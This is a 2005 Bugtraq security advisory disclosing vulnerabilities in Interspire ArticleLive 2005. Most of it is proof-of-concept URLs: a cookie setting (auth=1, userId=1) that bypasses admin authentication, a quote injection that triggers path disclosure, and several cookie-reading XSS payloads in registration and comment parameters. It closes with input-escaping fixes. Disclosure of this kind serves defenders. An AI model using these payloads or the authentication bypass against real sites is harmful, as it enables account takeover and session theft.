[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Authentication bypass, sql injections and xss in ArticleLive 2005
From:       dcrab <dcrab () hackerscenter ! com>
Date:       2005-05-03 20:55:27
Message-ID: 20050503205527.1033.qmail () www ! securityfocus ! com
[Download RAW message or body]



Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! \
http://www.digitalparadox.org/services.ah

Looking for Publishers intrested in my Php Secure Coding Book.


Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005

Vendor: Interspire
Vendor Website: http://www.interspire.com/articlelive/
Summary: There are, authentication bypass, sql injections and xss in articlelive \
2005.


Proof of Concept Exploits: 

http://www.example.com/admin/?
Full administrative authentication bypass

In the control panel, by setting your cookie to auth=1 and userId=1 would give you \
full administrative access.


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='Information \
DisclosureCategories=0 Full Path Disclosure

Warning: Wrong datatype for second argument in call to in_array in 
/home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on \
line 460

Warning: Bad arguments to implode() in \
/home/httpd/vhosts/example.com/httpdocs/templates/Default  \
(Stretched)/Panels/SearchResultsPanel.php on line 163


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&LastName=&Email=&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Email=&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
 XSS


http://www.example.com/blogs/newcomment/?BlogId='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 XSS


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input  validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilities have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel  free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic